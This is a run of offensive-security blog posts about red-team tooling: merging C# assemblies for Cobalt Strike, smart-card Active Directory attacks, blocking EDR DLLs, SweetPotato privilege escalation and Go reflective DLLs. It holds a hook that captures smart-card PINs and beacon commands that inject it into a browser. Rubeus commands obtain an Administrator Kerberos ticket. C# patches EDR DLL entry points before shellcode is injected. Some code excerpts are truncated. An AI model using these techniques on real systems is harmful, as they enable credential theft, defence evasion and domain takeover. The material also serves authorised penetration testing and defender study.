Merging C# Assemblies using dnMerge


When it comes to automating builds for any project that I undertake, my goto OS is usually Linux. Generally I find the deployment of build nodes easier to deploy and manage and usually cheaper than their Windows counterparts. The problem with this of course is Windows based software generally needs cross-compiling in someway or other. For C/C++ based tooling my goto build system is CMake and MinGW which makes cross compiling for Windows relatively easy.

When is comes to C# tool building on Linux we have the ability to use the dotnet core SDK. With the release of the Microsoft.NETFramework.ReferenceAssemblies nuget package, targeting most legacy .NET Frameworks is a breeze. A quick dotnet msbuild invocation within your C# project directory will generally yield executables that will run on Windows targeting the older framework versions as opposed to the newer .NET Core technology stack.

Unfortunately things start to fall apart when it comes to offensive C# tooling. With the ability to load and execute .NET assemblies through C2 frameworks such as Cobalt Strike, compilation usually involves the step of merging dependant assemblies into a monolithic exe ready for execution. Up until recently, my preference was to use Costura. Costura is a Fody extension that will compress and merge assemblies inside the main executable and uncompress and load from memory on demand during execution. That’s great, so what’s the problem? Since Costura is a build time dependency, on Linux it is executed under .NET Core during the build process. The net effect of this is additional .NET Core references will get pulled into your final assembly and commands such as execute-assembly will no longer work with assemblies cross-compiled from Linux due to the addition of .NET Core assembly references.

dnMerge Primer

I had a play around with MSBuild and developed a new build plugin called dnMerge. It works exactly like Costura where reference assemblies are compressed and merged during compilation but with the added benefit of retaining execute-assembly support when cross-compiling on Linux. Another benefit of dnMerge over Costura is the use of the LZMA compression algorithm over the traditional deflate algorithm used by Costura. When using Costura, a simple C# program with dependencies on cobbr’s (and other contributors) amazing SharpSploit library will result in a merged executable file a touch over 1MB. This eliminates the possibility of using execute-assembly inside Cobalt Strike due the 1MB or below hard limit on a single data transfer. With dnMerge the same project results in an executable size of around 800K which is usable with Cobalt Strike’s execute-assembly.

Using dnMerge in your project is as easy as adding the NuGet package from the central repo. Debug builds are left alone and unmerged to allow easy debugging, but release builds will automatically compress and merge dependant assemblies ready for use with execute-assembly.

Below is a quick Microsoft SDK project template to get you started that can be used to build within Visual Studio or the dotnet Core SDK on Linux. Alternatively, add the dnMerge NuGet package to your project and build.

I have been using dnMerge for a couple of months now and it is also used for merging assemblies for BOF.NET. But if you do encounter any problems using within your own project, please let me know by creating an issue on GitHub.


<Project Sdk="Microsoft.NET.Sdk">


    <PackageReference Include="dnMerge" Version="0.5.13">
      <IncludeAssets>runtime; build; native; contentfiles; analyzers; buildtransitive</IncludeAssets>

    <PackageReference Include="Microsoft.NETFramework.ReferenceAssemblies" Version="1.0.2">
      <IncludeAssets>runtime; build; native; contentfiles; analyzers</IncludeAssets>


  <PropertyGroup Condition="'$(Configuration)|$(TargetFramework)|$(Platform)'=='Release|net45|AnyCPU'">

  <PropertyGroup Condition="'$(Configuration)|$(TargetFramework)|$(Platform)'=='Debug|net45|AnyCPU'">


The full project source can be found on my GitHub repo.


dnMerge uses the brilliant dnLib library for .NET assembly modifications. Without this library dnMerge would not be possible.

7-Zip’s LZMA SDK is used for compressing and uncompressing merged assemblies.

Attacking Smart Card Based Active Directory Networks


Recently I was involved in an engagement where I was attacking smart card based Active Directory networks. The fact is though, you don’t need a physical smart card at all to authenticate to Active Directory that enforces smart card logon. The attributes of the certificate determine if it can be used for smart card based logon not the origin of the associated private key. So if you have access to the corresponding private key, smart card logon can still be achieved.

When a user has been enrolled for smart card based login, in it’s default configuration, the domain controller will accept any certificate signed by it’s trusted certificate authority that meets the following specification:

  • CRL Distribution Point must be populated, online and available
  • Key Usage for the certificate is set to Digital Signature
  • Enhanced Key Usages:
    • Smart Card Logon
    • Client Authentication (Optional, used for SSL based authentication)
  • Subject Alternative Names containing user UPN’s
  • Fully distinguished AD name of the user as the Subject

Additionally if the Allow certificates with no extended key usage certificate attribute group policy is enabled, the enhanced key usages doesn’t need to be present at all. This can lead to the abuse of other types of certificates issued to domain users or computers. Check out the post from CQURE Academy on how this policy can be abused.

Typical certificate capable of PKI/smart card login

This particularly journey of mine then began. How can we take leaked private keys or physical smart card pins and use them to our advantage.


As many of you are aware, modern day Active Directory uses Kerberos for authenticating to the domain. Tools like Rubeus, Mimikatz, Kekeo and impacket can be used to abuse Kerberos to the attackers advantage.

So where does PKI based authentication fit in with Kerberos? Back in 2006, a combined effort between Microsoft and the Aerospace Corporation submitted RFC 4556. This introduced public key cryptography support for Kerberos pre-authentication.

Pre-authentication is Kerberos’s answer to offline brute force attacks on an account password. Without pre-authentication enabled on an AD account, users are vulnerable to AS-REP roasting attacks. With the introduction of pre-authentication, the initial AS-REQ Kerberos request contains an encrypted timestamp. The key used to encrypt it is derived from the users password. This proves to the KDC that the user requesting the login does know the account password. Therefore, the KDC is happy to send back an encrypted AS-REP (response to AS-REQ) tied to the users password. The fact that the pre-auth data contains a timestamp also prevents replay attacks. If the pre-authenticated data is not valid, the KDC returns with an error, and no brute forcing of the AS-REP response key is possible. If an attacker is suitable placed within a network to spy on Kerberos responses though, AS-REP roasting is still possible.

PKI based authentication works in a similar fashion. It uses Kerberos pre-authentication to prove the user is who they say they are. Again, this uses a timestamp, but instead of encrypting the message with the users password derived key, it signs the message in the form of a PKCS #7 Cryptographic Message Syntax (CMS) payload using the private key belonging to the certificate. This private key can be present on a physical smart card or also be stored in other forms too, including not so secure methods. Once the KDC validates the signature of the CMS payload and everything checks out, an AS-REP is sent back to the client. One final detail of PKINIT is the encryption used for the AS-REP response. Because no password is used during a PKI based Kerberos login the user key is unknown to the client. To combat this, the AS-REP is either encrypted using a key that is obtained using the Diffie-Hellman key exchange algorithm or it is encrypted with the public key of the certificate used in the initial AS-REQ request. This initial request contains the details on which method is preferred.

From here on out, everything else remains the same. The client will have a valid TGT that can be used to request TGS tickets. The certificate is no longer used for the lifetime of the TGT and will generally remain valid for 7 days before the private key for the certificate is needed again. That’s not to say during Windows logon the private key doesn’t get used for 7 days. If the machine is locked or a user has logged out, Windows will enforce an authentication as it does with a password based login. But from an attackers perspective, this is irrelevant if they have obtained a TGT.

More in depth details on interactive and network based logon using smart cards can be found from the MS-PKCA documentation.

Rubeus with PKINIT

So I started working on adding PKINIT support to Rubeus and created a pull request. I have to give a big shout out to the Kerberos king @SteveSyfus. Kerberos.NET was a massive help when trying to understand the inner workings of PKINIT and some modified code worked it’s way into Rubeus. Also a tip of the hat to to @gentilkiwi for Kekeo/Mimikatz and @harmj0y and other Rubeus contributors. I wouldn’t have such a great tool start with in the first place if it wasn’t for their hard work.

PKCS#12 Based Authentication (PFX)

The first attack scenario I’ll cover is the exposure of a users private key. We can use a PKCS#12 certificate store which contains a users certificate along with the corresponding private key to generate a Kerberos TGT. Generating the pfx will depend on how you have managed to expose private keys in the first place. You can use OpenSSL to generate a PKCS12 store once you have the private key blob and corresponding certificate like this:

openssl pkcs12 -export -out leaked.pfx -inkey privateKey.key -in certificate.crt 

Once you have generated a valid certificate store, we can use the new addition to Rubeus to request a TGT. If you decide to protect the certificate store with a password, you can add the /password option to the command line.

Rubeus.exe asktgt /user:Administrator /certificate:leaked.pfx /domain:hacklab.local /dc:dc.hacklab.local

Rubeus will then generate a PKINIT based AS-REQ using the supplied certificate store to authenticate the user. If everything checks out and the KDC is happy you should get something similar to this:

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/
[*] Action: Ask TGT
[*] Using PKINIT with etype rc4_hmac and subject: CN=Administrator, CN=Users, DC=hacklab, DC=local
[*] Building AS-REQ (w/ PKINIT preauth) for: 'hacklab.local\Administrator'
[+] TGT request successful!
[*] base64(ticket.kirbi):
  ServiceName           :  krbtgt/hacklab.local
  ServiceRealm          :  HACKLAB.LOCAL
  UserName              :  Administrator
  UserRealm             :  HACKLAB.LOCAL
  StartTime             :  02/10/2020 16:01:12
  EndTime               :  03/10/2020 02:01:12
  RenewTill             :  09/10/2020 16:01:12
  Flags                 :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType               :  rc4_hmac
  Base64(key)           :  6tIiFytU5V2cgSpXt8skdw==

The resulting .kirbi Base64 encoded string can then be used for obtaining TGS’s from the KDC as normal.

Physical Smart Card Login

After I managed to get PKINIT working with a certificate store, it then got me thinking on how we could use a physical smart card too. The main obstacle to using smart cards once a compromise of a users machine occurs is of course the PIN. Without knowing the PIN we cannot generate a valid AS-REQ. Brute forcing is out of the question since 3 invalid attempts and the card will lock you out.

One option is to capture the PIN when a user is required to unlock the smart card. This could be for a machine unlock/login, website login or other services on the network that requires smart card authentication.

After a little investigation this led me to the WinSCard DLL. This DLL is the gateway to communicating with the Smard Card service. The service then controls the resources and communication with the smart cards themselves. Generally anything that communicates with the smart card on Windows will use the WinSCard API. This also includes LSASS during login and Internet Explorer / Edge browser when authenticating to websites that require smart card authentication.

The specific export from the WinSCard.dll that interested me was the SCardTransmit API. This is the API used to transmit what the smart card ISO/IEC 7816 specification calls an Application Protocol Data Unit (APDU). This is the lowest level transmission unit that is used to communicate with a smart card.

Field nameLength (bytes)Description
CLA1Instruction class – indicates the type of command, e.g. interindustry or proprietary
INS1Instruction code – indicates the specific command, e.g. “write data”
P1-P22Instruction parameters for the command, e.g. offset into file at which to write the data
Lc0, 1 or 3Encodes the number (Nc) of bytes of command data to follow0 bytes denotes Nc=0
1 byte with a value from 1 to 255 denotes Nc with the same value
3 bytes, the first of which must be 0, denotes Nc in the range 1 to 65 535 (all three bytes may not be zero)
Command dataNcNc bytes of data
Le0, 1, 2 or 3Encodes the maximum number (Ne) of response bytes expected0 bytes denotes Ne=0
1 byte in the range 1 to 255 denotes that value of Ne, or 0 denotes Ne=256
2 bytes (if extended Lc was present in the command) in the range 1 to 65 535 denotes Ne of that value, or two zero bytes denotes 65 536
3 bytes (if Lc was not present in the command), the first of which must be 0, denote Ne in the same way as two-byte Le
Response APDU
Response dataNr (at most Ne)Response data
(Response trailer)
2Command processing status, e.g. 90 00 (hexadecimal) indicates success
APDU Structure from Wikipedia

If we hook this API, then we should be able to spy on PDU’s transmitted to the card.

LONG SCardTransmit(
  SCARDHANDLE         hCard,
  LPCBYTE             pbSendBuffer,
  DWORD               cbSendLength,
  LPBYTE              pbRecvBuffer,
  LPDWORD             pcbRecvLength

The pbSendBuffer parameter contains the APDU packet that is is making it’s way to the card and the pbRecvBuffer will contain the response from the smart card.

Whilst the ISO smart card specification has recommendations for certain command classes and command data structures, these are generally application specific and not defined by the ISO smart card specification itself. So where do we look for answers now? For identity and access purposes NIST produced the Personal Identity Verification (PIV) SP 800-73-4 specification. Without going into too much detail, the specification covers how the smart card should handle certificates enrolled onto the device along with all the APU’s to implement the specification. The area of interest within the PIV specification is section 3.2.1 VERIFY Card Command. The section describes how the VERIFY APDU is used to validate the PIN prior to allowing access to private keys stored on the card.

So armed with the information from the ISO specification along with section 3.2.1 from the PIV specification we should be able to produce a reliable hook to capture a PIN transmitted to the card. I covered API hooking in my EDR series of blog posts, so the methods used here a the same. Here is the implementation of the hooked API.

	LPCBYTE             pbSendBuffer,
	DWORD               cbSendLength,
	LPBYTE              pbRecvBuffer,
	LPDWORD             pcbRecvLength) {
	char debugString[1024] = { 0 };
	DWORD result = pOriginalpSCardTransmit(hCard, pioRecvPci, pbSendBuffer, cbSendLength, pioRecvPci, pbRecvBuffer, pcbRecvLength);
	//Check for CLA 0, INS 0x20 (VERIFY) and P1 of 00/FF according to NIST.SP.800-73-4 (PIV) specification
	if (cbSendLength >= 13 && pbSendBuffer[0] == 0 && pbSendBuffer[1] == 0x20 && (pbSendBuffer[2] == 0 || pbSendBuffer[2] == 0xff)) {
		//Check card response status for success
		bool success = false;
		if (pbRecvBuffer[0] == 0x90 && pbRecvBuffer[1] == 0x00) {
			success = true;
		char asciiPin[9];
		sprintf_s(debugString, sizeof(debugString), "Swipped VERIFY PIN: Type %s, Valid: %s, Pin: %s", GetPinType(pbSendBuffer[3]), success ? "true" : "false", 
			GetPinAsASCII(pbSendBuffer+5, min(pbSendBuffer[4],8), asciiPin));
	return result;

The first thing the API call does is call the original SCardTransmit function. Not only are we interested in the request we also want to know the response from the card. This way we can determine if the transmitted PIN to the card was correct too. The function then looks for the VERIFY PDU to isolate commands specific to verifying the PIN. Once we have determined a VERIFY PDU is in progress we check the result, 0x90 0x00 signifies the PIN was validated correctly. Next, we extract the PIN from the send buffer at offset 5 (Command data within the PDU structure). Finally we transmit the PIN details over a named pipe ready for capture by a receiving application interested in the data.

Packaging this functionality into a DLL that is also capable of being reflectively loaded will allow the DLL to be injected into our process of interest without hitting the disk. You can find the complete PinSwipe project on my GitHub repo which also includes a .NET PinSwipeListener console app that will list certificates found with the Smart Card Logon Enhanced Key Usage attribute then setup a listening pipe to capture swiped PIN’s.


In this assumed breach scenario I already have a Cobalt Strike beacon connected to a victim workstation. I am using an Administrator account but a limited account will work too. The PinSwipe DLL can be injected into a high privilege process like lsass when Administrative access is obtained which enables swiping PINs during login, but with limited user level access you will be restricted to injecting into user mode processes like Internet Explorer etc…

So first of all let’s launch PinSwipeListener, this will dump out certificate information for user certificates that have the Smart Card Logon EKU.

beacon> execute-assembly C:\tools\PinSwipeListener.exe
[*] Tasked beacon to run .NET program: PinSwipeListener.exe
[+] host called home, sent: 112171 bytes
[+] received output:
[+] Found smart card logon certificate with thumbprint 55C65AB0B9B6A893A6E8449FB34DD61093B231D8 and subject CN=Administrator, CN=Users, DC=hacklab, DC=loca

With the listener now in place we need to choose which processes to inject PinSwipe.dll into. Targets like Internet Explorer, Chrome etc… are good choices since these will regularly pop up requesting PIN’s in a smart card authenticated environment. For the demo I was running Internet Explorer which was running under PID 2678. I should note that IE, like Chrome, launches child processes for various tabs in use. So you’ll need to inject the correct process. Other more advanced aggressor scripts could be used that continually look out for new IE processes and inject into them all, but I will leave that as an exercise for the reader.

beacon> dllinject 2678 C:\tools\PinSwipe.dll
[*] Tasked beacon to inject C:\tools\PinSwipe.dll into 2678

Once a user enters their PIN into the dialog, PinSwipe should do its thing and capture the request and send it over the named pipe to PinSwipeListener.

IE presenting PIN dialog for end user
[+] received output:
[+] PinSwipe: Swipped VERIFY PIN: Type PIV Card Application, Valid: true, Pin: 123456

The output for PinSwipe will indicate if the entered PIN was correct in addition to the PIN number entered. Once you have captured the PIN you can use the new Rubeus feature to request a TGT using the users physical smart card. This time the /certificate parameter will reference the thumbprint or subject name of the certificate to use not a pfx file like in first demo. The output from PinSwipeListener will help when supplying this argument.

beacon> execute-assembly C:\tools\Rubeus.exe asktgt /user:Administrator /domain:hacklab.local /dc: /certificate:55C65AB0B9B6A893A6E8449FB34DD61093B231D8 /password:123456
[*] Tasked beacon to run .NET program: Rubeus.exe asktgt /user:Administrator /domain:hacklab.local /dc: /certificate:55C65AB0B9B6A893A6E8449FB34DD61093B231D8 /password:123456
[+] host called home, sent: 357691 bytes
[+] received output:
   ______        _                      
  (_____ \      | |                     
   _____) )_   _| |__  _____ _   _  ___ 
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/
[*] Action: Ask TGT
[+] received output:
[*] Using PKINIT with etype rc4_hmac and subject: CN=Administrator, CN=Users, DC=hacklab, DC=local 
[*] Building AS-REQ (w/ PKINIT preauth) for: 'hacklab.local\Administrator'
[+] received output:
[+] TGT request successful!
[+] received output:
[*] base64(ticket.kirbi):
  ServiceName           :  krbtgt/hacklab.local
  ServiceRealm          :  HACKLAB.LOCAL
  UserName              :  Administrator
  UserRealm             :  HACKLAB.LOCAL
  StartTime             :  04/10/2020 19:55:29
  EndTime               :  05/10/2020 05:55:29
  RenewTill             :  11/10/2020 19:55:29
  Flags                 :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType               :  rc4_hmac
  Base64(key)           :  5K2V8xIaGbUS8ZYqTl120Q==

That is it. You now have a TGT that can be used for 7 days for requesting new TGS tickets for accessing other network resources.

Final Notes

When using physical smart cards within your network it’s always a good idea to have cards that require a physical press of a button or better still a biometric reader. That way, any compromise of a users account will not lead to generating TGT’s since the smart card will prevent access to the private keys without the physical press of a button or biometric data being present.


Lets Create An EDR... And Bypass It!

Lets Create An EDR… And Bypass It! Part 2

In part one of this series we created a basic active protection EDR that terminated any program that modified memory for RWX. This was accomplished by hooking the VirtualProtect API and monitoring for the RWX memory protection flags. Check out part 1 of this series for a more detailed description on how this was done.

In part 2 I’m going to cover some bypass methods that I have seen others document and then demonstrate another method along with accompanying code.

OK, so with the introduction out the way, what methods are currently in use and the pros and cons of each bypass.

Blending in

The simplest of the methods doesn’t involve any magic at all and is all about blending in. The EDR hooks remain in place but don’t alert on any suspicious activity due the implementation of the malware. A good example of bypassing our EDR from part 1 would be to ensure that you never change or allocate memory for RWX. If you need to allocate new code or update existing code use RW mode first, then change to RX once the update is complete. If the code has no option to behave in suspicious ways, it’s time to look at bypass methods.


Unhooking the hooked API calls is another option. This involves reversing the operation that the EDR’s implement when patching the hooked API’s. Generally this involves loading a clean copy of the hooked DLL’s from disk and overwriting the hooked functions code. Typically this is usually only 5 bytes per hooked function. There are a few examples of how this can be done, but one such example can be found on the website. Unhooking could potentially be detected by EDR’s during this process.

Direct syscall instructions

By far the most effective solution is direct syscall instructions. This is where the malware does not make calls to the API’s themselves but implements the same stub code that the lowest level API calls implement prior to transferring to kernel mode. Since no API calls are made prior to hitting kernel code, the EDR is blind to these types of calls. This is due to the fact that generally all EDR’s implement the active protection in-process within userland code, which inherently is their weakness.

Direct syscall bypass comes at a price though. It’s by far the hardest to get right and the most verbose in code terms. Since direct syscalls are utilising the lowest level of API’s there is a ton of boilerplate needed for some functions to be called correctly. Let’s take the higher level CreateProcess API. If you wanted to create a process using syscalls only, you probably need to implement somewhere in the region of 20-30 syscall implementations. Take a look at ReactOS’s implementation of CreateProcessInternal if you don’t believe me.

Other complications that come from using direct syscalls is 32bit processes running on 64bit. 32bit programs actually switch to 64bit prior to making the syscall and then back again when returning from kernel land. Syscall indexes can also change between versions of Windows. Syscalls are implemented using a table within the kernel with the index used to reference a particular syscall. This index can change, so again, something that needs to be considered.

I have seen some excellent work in this area recently that makes the process easier. Here are some great examples

Microsoft Signed DLL Process Mitigation Policy

Another method of bypassing EDR’s can be achieved by enabling the Microsoft Signed DLL Process Mitigation Policy. Wow, that’s a mouthful. The policy is designed to prevent any DLL that is not signed by Microsoft from loading into any process where the policy is enabled. This prevents EDR’s that have not been signed or cross-signed by Microsoft from loading into the process. have covered this method on their blog post and infact is the same solution implemented by Cobalt Strike’s blockdlls command. The policy can be enabled in-process, but it does not prevent DLL’s that have not been loaded already. This generally means it’s only effective on child processes created by your malare. It’s a simple solution to implement but all bets are off if the EDR’s active protection DLL is cross-signed by Microsoft or if Microsoft themselves implement active protection EDR within the likes of Windows Defender ATP. The policy will also prevent the malware from loading other non Microsoft DLL’s that it may need to function.


Now that we have covered many of the EDR bypass solutions in use today, I’d like introduce SharpBlock. It’s just another method that I thought could be used for bypassing EDR’s that I don’t think I’ve seen used before (please let me know if you do find something).

SharpBlock can be used to load a child process and prevent any DLL from hooking into the child process. Since it specifically targets a DLL from hooking, it will still allow other DLL’s from loading into the process.

How does it work?

When SharpBlock spawns the requested child process, it uses the Windows Debug API to listen for debug events during the lifecycle of the child process. When a process is being debugged, the parent debugger process will receive these events, but the child process will be paused during this time. The fact the child process is paused during these events is a key element to why this method works. So what events are fired when debugging a process.

CREATE_PROCESS_DEBUG_EVENTFired on initial process creation, incuding child processes.
CREATE_THREAD_DEBUG_EVENTFired when a new thread is created.
EXCEPTION_DEBUG_EVENTFired when an exception occurs.
EXIT_PROCESS_DEBUG_EVENTA process has exited, including a child process.
EXIT_THREAD_DEBUG_EVENTA thread has exited
LOAD_DLL_DEBUG_EVENTA DLL has loaded within a process or one of it’s children.
OUTPUT_DEBUG_STRING_EVENTDebug strings written using the OutputDebugString API
UNLOAD_DLL_DEBUG_EVENTA DLL has unloaded within the debugged process or it’s children.
Debug Events

As I’m sure you have guessed by now, the particular event we are interested in is LOAD_DLL_DEBUG_EVENT. When a debugged process or one of it’s children load’s a DLL, we want to know about it.

Once we receive the event and determine it’s a DLL we would like to block, then how do we actually block it’s behavior? Well lets revisit our DLL entry point from our uber cool EDR, SylantStrike.

                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
    switch (ul_reason_for_call)
        //We are not interested in callbacks when a thread is created

        //We need to create a thread when initialising our hooks since
        //DllMain is prone to lockups if executing code inline.
        HANDLE hThread = CreateThread(nullptr, 0, InitHooksThread, nullptr, 0, nullptr);
        if (hThread != nullptr) {

    return TRUE;

What if we change the entry points behavior to the equivalent code?

                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
    return TRUE;

If we patched the code at runtime to essentially implement this behavior, the InitHooksThread function is never called, and ergo the hooks are never put in place. We can accomplish this with the 0xC3 opcode, which translates to the x86/x64 ret instruction. If we patch the entry point function with 0xC3 at the beginning, we should get the desired effect. Before we can patch the entry point though, we need to figure out where that is.

            PE.IMAGE_DOS_HEADER dosHeader = (PE.IMAGE_DOS_HEADER)Marshal.PtrToStructure(mem, typeof(PE.IMAGE_DOS_HEADER));
            PE.IMAGE_FILE_HEADER fileHeader = (PE.IMAGE_FILE_HEADER)Marshal.PtrToStructure( new IntPtr(mem.ToInt64() + dosHeader.e_lfanew) , typeof(PE.IMAGE_FILE_HEADER));

            UInt16 IMAGE_FILE_32BIT_MACHINE = 0x0100;
            IntPtr entryPoint;
            if ( (fileHeader.Characteristics & IMAGE_FILE_32BIT_MACHINE) == IMAGE_FILE_32BIT_MACHINE) {
                PE.IMAGE_OPTIONAL_HEADER32 optionalHeader = (PE.IMAGE_OPTIONAL_HEADER32)Marshal.PtrToStructure
                    (new IntPtr(mem.ToInt64() + dosHeader.e_lfanew + Marshal.SizeOf(typeof(PE.IMAGE_FILE_HEADER))), typeof(PE.IMAGE_OPTIONAL_HEADER32));

                entryPoint = new IntPtr(optionalHeader.AddressOfEntryPoint + imageBase.ToInt32());

            } else {
                PE.IMAGE_OPTIONAL_HEADER64 optionalHeader = (PE.IMAGE_OPTIONAL_HEADER64)Marshal.PtrToStructure
                    (new IntPtr(mem.ToInt64() + dosHeader.e_lfanew + Marshal.SizeOf(typeof(PE.IMAGE_FILE_HEADER))), typeof(PE.IMAGE_OPTIONAL_HEADER64));

                entryPoint = new IntPtr(optionalHeader.AddressOfEntryPoint + imageBase.ToInt64());                

The code above analyses the PE header of the DLL that is in the process of being loaded to find out where the DLL entry point resides. I should note that the DLL entry point does not actually point to DllMain, but usually the C runtime initialiser that will eventually call DllMain. But for all intents and purposes we’ll call it DllMain.

Once we have calculated the final address of the entry point, we can then use the WriteProcessMemory API call to write over the entry point with the ret instruction.

                Console.WriteLine("[+] Patching DLL Entry Point at 0x{0:x}", entryPoint.ToInt64());

                if (PInvokes.WriteProcessMemory(hProcess, entryPoint, retIns, 1, out bytesWritten)) {
                    Console.WriteLine("[+] Successfully patched DLL Entry Point");
                } else {
                    Console.WriteLine("[!] Failed patched DLL Entry Point");

Finally, we can trigger the process to continue on it’s merry path without the EDR hooks being applied.



SharpBlock by @_EthicalChaos_
  DLL Blocking app for child processes

  -e, --exe=VALUE            Program to execute (default cmd.exe)
  -a, --args=VALUE           Arguments for program (default null)
  -n, --name=VALUE           Name of DLL to block
  -c, --copyright=VALUE      Copyright string to block
  -p, --product=VALUE        Product string to block
  -d, --description=VALUE    Description string to block
  -h, --help                 Display this help

SharpBlock will default to launching cmd without any arguments, but this can be overridden with the -e and -a arguments respectively. The rest of the arguments can be specified multiple times to block any DLL from it’s name on disk, the copyright value within the version info, the product value from the version info or the description value from the version info. A DLL’s version info can be found in the Details tab when viewing the file’s properties from explorer.

Going back to our example EDR from part one, this time we load notepad.exe using SharpBlock

SharpBlock.exe -e c:\windows\system32\notepad.exe -d "Active Protection DLL for SylantStrike"

The SylantStrikeInject process will then detect the launch of notepad and attempt to load the active protection DLL

SylantStrikeInject.exe -p notepad.exe -d C:\tools\SylantStrike.dll
Waiting for process events
Listening for the following processes: notepad.exe 

+ Injecting process notepad.exe(6784) with DLL C:\tools\SylantStrike.dll

But this time, SharpBlock detects the loaded DLL from the description field of SylantStrike.dll’s version info and patches the entry point

SharpBlock by @_EthicalChaos_
DLL Blocking app for child processes

[+] Launched process c:\windows\system32\notepad.exe with PID 6784
[+] Blocked DLL C:\tools\SylantStrike.dll
[+] Patching DLL Entry Point at 0x7ffd89932c74
[+] Successfully patched DLL Entry Point

Attempting to injecting our shellcode from part 1 using Cobalt Strike results in the successful launch of calc and cmd and is not blocked by SylantStrike’s active DLL protection.

shinject 6784 x64 C:\Tools\SylantStrike\loader.bin

If you are interested in giving it a go, head over to the SharpBlock project on GitHub


Sweet Potato

SweetPotato – Local Service to SYSTEM

SweetPotato – Service to SYSTEM

I have had a keen interest in the original RottenPotato and JuicyPotato exploits that utilize DCOM and NTLM reflection to perform privilege escalation to SYSTEM from service accounts. The applications behave by leveraging the SeImpersontePrivilege and MITM to perform privilege escalation when a high privilege process connects to a MITM server running on the same machine.

I wont dive into too much detail since the method has been covered extensively by Fox Glove Security and Decoder’s Potatoes and tokens blog.

In the interest expanding my knowledge on the subject I decided to rewrite JuicyPotato in C#. In addition to the original JuicyPotato functionality I also added an additional PrivEsc that decoder and a few others had found with the BITS service. When instantiating a BITS COM object, if the service is not running, COM will start the service on behalf of the user requesting the COM object. On startup, the BITS service attempts to connect to the local WinRM service on port 5985. If WinRM is not active, we can setup a server to listen on port 5985 and force the BITS service running as SYSTEM to preform local NTLM authentication and impersonate. Further details about the the discovery can be found on decoder’s blog here


The tool was designed to be used with Cobalt Strike’s execute-assembly command, so it carries no baggage in the form of dependencies. A release build is circa ~70KB in size and works for both 32bit and 64bit processes. Since the original DCOM vulnerability that Rotten/JuicyPotato exploits is fixed in Windows 10 1809+ and Windows Server 2019 the tool should automatically switch to the BITS/WinRM exploit described above. So to recap:

  • Works on Windows 7 up to the latest version of Windows 10 and Server 2019
  • Compatible with execute-assembly from Cobalt Strike an other C2 projects that support in memory execution of .NET executables
  • Works on 32 bit and 64 bit operating systems.
  • Can be compiled for for .NET 2 and 4 depending on target OS.
  • Automatically attempts the correct exploit to execute.

If you are interested in trying it out, head over to the GitHub project here


The tool should work an all flavors of Windows but will only work when executed from a process with impersonate privileges. This is typically given to services, but can be a low privilege Network Service or similar. Additionally for the exploit to work on the latest Windows 10 or Windows Server 2019, WinRM cannot be enabled. This is the default for Windows 10, but not for Windows Server 2019.


Huge shout out to @decoder_it and @Giutro for JuicyPotato which SweetPotato is heavily based upon and of course @foxglovesec for the original RottenPotato code.

Weaponizing your favorite Go program for Cobalt Strike


There are a myriad of ways currently to weaponize various offsec tools for use within Cobalt Strike. Many of these methods remain undetectable by modern day AV and EDR engines. Anything from in-memory PowerShell execution to using the execute-assembly command to run your latest SharpXXX .NET binary completely from memory.

Recently I have noticed an increase in the use of Golang for writing many offsec tools. Why? Well personally I put it down to the ease of compiling on both Windows, Linux and dare I say MacOS. In addition to ease of compiling, Golang can produce monolithic binaries that have no dependencies what so ever, other than the DLL’s or shared objects that are distributed as part of the operating system. The drawback of this of course is fairly large binaries. A simple helloworld program with Go 1.7+ comes in at around 1MB after stripping debug symbols. Once you start throwing in imports to 3rd party libraries this can easily reach 8MB+ and beyond.

So with the single monolithic binary in mind, I started looking at how a Go program can be weaponized for offsec purposes within Cobalt Strike. Cobalt Strike and metasploit have the capability of reflectively loading a DLL and executing it directly from memory. I won’t cover reflective loading here, since there are plenty of write-ups already on the subject, but if you are interested, head over to Stephen Fewer’s ReflectiveDLLInjection project which is one of the originals that many are based on today.


I have released a template project on GitHub than can be used to convert your favorite Go tool and compile it as a reflective DLL. The template is based on gobuster, but the project can be adapted for any Go tool. Currently the project is built using CMake, GCC and of course the Golang compiler. It utilizes the CGO interface within Go, which allows your Go entry point to be called from the reflective DllMain

The top level project file, CMakeLists.txt, is the glue for building our reflective DLL. The project adds gobuster as a dependency to our goreflect program, which in turn is linked to our reflective DLL, libgoreflect.

project (goreflect)
#Dependency to add simple Go support to CMake
#Your favorite go tool definition
#Dependency for goreflect to allow parsing of a command line string
#Our Go static library, result is linkable using GCC
                           goreflect.go  # our lightweigth wrapper around gobuster
                           gobuster gsq) # everything else is a dependency
#Standard C shared library using metasploits version of the reflective loader code
add_library(goreflect SHARED "ReflectiveDll.c" "ReflectiveLoader.c" "ReflectiveLoader.h" "ReflectiveDLLInjection.h")
target_include_directories(goreflect PUBLIC ${CMAKE_BINARY_DIR})
#Linking all our dependencies as static, including our go program.  Results in no dependancies
target_link_libraries(goreflect ${CMAKE_BINARY_DIR}/libgoreflect_prog.lib -static-libgcc -static-libstdc++ -static -lpthread )

Our goreflect program a is a simple wrapper that exports our CGO function to the C world under the name start, allowing it to be called from our reflective DLL. The arg parameter is then parsed into individual arguments that can be used to call our go program. Now since go does not allow multiple main packages to be declared within a single program, we cannot import or call gobusters main directly. But luckily most go programs are designed in such a way that the main function is a proxy for the real main inside a separate package, in this case If you find that this is not the case, you may need to replicate some of the main code inside the startfunction within goreflect.go

package main
import "C"
import (
	 gsq ""
func main(){
	//not used
//export start
func start(arg string) {
	//parse our monolithinc argument string into individual args
	args, err := gsq.Split(arg)
	//our first argument is usally the program name, to just fake it
	args = append([]string{"goreflect"}, args...)
	if err == nil {
		//replace os.Args ready for calling our go program
		os.Args = args
		//run our go program
	} else {
		//parsing arguments failed, so bail.  Possibly unterminated string quote, etc...
		fmt.Printf("Failed to parse start arguments, %v\n", err)

Our final piece of logic sits inside the ReflectiveDll.c file. This file holds the entry point to our reflective DLL and will call our start function exported from our go program. The DllMain function again is a fairly lightweight.

// This is a stub for the actuall functionality of the DLL.
#include "ReflectiveLoader.h"
#include <libgoreflect_prog.h>
